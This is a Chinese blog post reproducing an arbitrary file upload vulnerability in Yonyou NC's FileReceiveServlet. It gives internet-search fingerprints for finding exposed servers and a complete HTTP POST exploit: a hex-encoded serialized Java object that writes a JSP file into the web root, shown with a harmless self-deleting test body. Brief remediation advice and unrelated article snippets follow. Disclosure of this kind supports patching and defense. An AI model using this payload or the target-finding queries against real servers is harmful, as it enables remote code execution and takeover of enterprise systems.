首页 > 其他分享 >【漏洞复现】用友 NC FileReceiveServlet 任意文件上传漏洞

【漏洞复现】用友 NC FileReceiveServlet 任意文件上传漏洞

时间:2024-07-26 19:24:59浏览次数:13  
标签:漏洞 NC 访问 服务器 用友 FileReceiveServlet

免责声明:

        本文内容旨在提供有关特定漏洞或安全漏洞的信息,以帮助用户更好地了解可能存在的风险。公布此类信息的目的在于促进网络安全意识和技术进步,并非出于任何恶意目的。阅读者应该明白,在利用本文提到的漏洞信息或进行相关测试时,可能会违反某些法律法规或服务协议。同时,未经授权地访问系统、网络或应用程序可能导致法律责任或其他严重后果。作者不对读者基于本文内容而产生的任何行为或后果承担责任。读者在使用本文所提供的信息时,必须遵守适用法律法规和相关服务协议,并独自承担所有风险和责任。

产品简介

用友NC是大型企业管理与电子商务平台,帮助企业实现管理转型升级全面从以产品为中心转向以客户为中心(C2B);从流程驱动转向数据驱动(DDE);从延时运行转为实时运行(RTE);从领导指挥到员工创新(E2M)

漏洞描述

用友 NC 的 FileReceiveServlet 文件存在一个任意文件上传漏洞。攻击者可以通过这个漏洞上传恶意文件到服务器,从而获取服务器的控制权,以及在服务器上执行任意命令,访问敏感数据,甚至完全接管服务器,对系统的安全性构成严重威胁。

网络空间会测

Fofa

title="YONYOU NC"

Hunter

app.name="用友 NC Download Page"

Quake

app:"用友 NC"

image.png

漏洞复现

POST /servlet/FileReceiveServlet HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.11 TaoBrowser/2.0 Safari/536.11
Content-Length: 245
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data
Connection: close

{{hex.DecodeString("ACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C7708000000100000000274000946494C455F4E414D45740009")}}8TEST.jsp{{hex.DecodeString("7400105441524745545F46494C455F504154487400102E2F776562617070732F6E635F77656278")}}<%out.println("test");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>

image.png
文件访问路径 /8TEST.jsp
image.png

修复建议

1、如⾮必要,禁⽌公⽹访问该系统。
2、用防火墙等安全设备设定访问规则,只允许白名单中的设备访问。
3、及时升级产品到最新版本。

标签:漏洞,NC,访问,服务器,用友,FileReceiveServlet
From: https://blog.csdn.net/weixin_41924764/article/details/140425870

相关文章

  • asyncio Queue和Semaphore的结合使用
    importasyncio#假设这是你的大数据集large_data_set=range(1000000)#用1到1000000的数字模拟大数据集#任务队列task_queue=asyncio.Queue()#并发限制sem=asyncio.Semaphore(10)#任务处理函数asyncdefprocess_data(sem,q):whileTrue:#......
  • 限时10分钟,你会怎么实现这段async/await代码?
    ......
  • 24HNCTF
    secret看到是图片,我一般会去010看看发现数据异常?kali启动发现藏了一个压缩包分离喽压缩包里面存放着flag文件打开发现没有当时就没有什么办法了然后我放在了物理机上发现有129个字符,与文本上的字符不匹配用vim打开哦呦,有隐写呦这就会联想到是零宽度字符的Uni......
  • Fatal error: Call to undefined function mysql_connect() in …
    错误记录:Fatalerror:Calltoundefinedfunctionmysql_connect()in…错误原因:运行环境问题解决方案:你的PHP不支持mysql_connect()函数。PHP是一种模块化的设计,除了核心的内容,其他都是可选的。之所以不支持,是因为在编译PHP时没有加入对MYSQL数据库的支持。原因2:......
  • Android开发 - 存储辅助类 SharedPreferences 解析
    SharedPreferences简介SharedPreferences是Android平台上一个轻量级的存储辅助类,用来保存应用的一些常用配置。SharedPreferences的数据以键值对(key,val)的进行保存在以xml形式的文件中。在应用中通常做一些简单数据的持久化缓存从editor的put方法可以看出SharedPreferenc......
  • HDU 1020 Encoding
    题目链接:HDU1020【Encoding】思路    简单模拟,计算相同字母的连续子串个数。代码#include<iostream>#include<algorithm>#include<queue>usingnamespacestd;#definelllonglongconstintN=500+10;voidsolve(){strings;cin>>s;int......
  • OpenCompass 评测 InternLM-1.8B 实践
    1.进入https://opencompass.org.cn/home,点击在线测评,创建在线测评2.选择internlm2-chat-1.8b模型,与MMLU数据集,开始测评3.查看测评结果......
  • Leetcode 1334 Find the City With the Smallest Number of Neighbors at a Threshold
    Problem:FindtheCityWiththeSmallestNumberofNeighborsataThresholdDistanceTheknowledgepointsoutsideofmyskilltreeExplanationofCodeandConceptsWhatisfloat('inf')?float('inf')inPythonrepresentspositiveinfin......
  • 【Android】数据存储方案——文件存储、SharedPreferences、SQLite数据库用法总结
    文章目录文件存储存储到文件读取文件SharedPreferences存储存储获取SharedPreferences对象Context类的getSharedPreferences()方法Activity类的getPreferences()方法PreferenceManager类中的getDefaultSharedPreferences()方法示例读取记住密码的功能SQLite......
  • ValueError:仅顺序模型或功能模型支持参数clone_function和input_tensors
    我正在使用量化感知训练我参考了网上的lstm代码,想放入QAT放入lstm,但是遇到了ValueError。ValueErrorTraceback(最近一次调用last)在<细胞系:6>()4返回层5---->6注释模型=tf.keras.models.clone_model(7型号,8clone_model(模型,input_tensors,clone......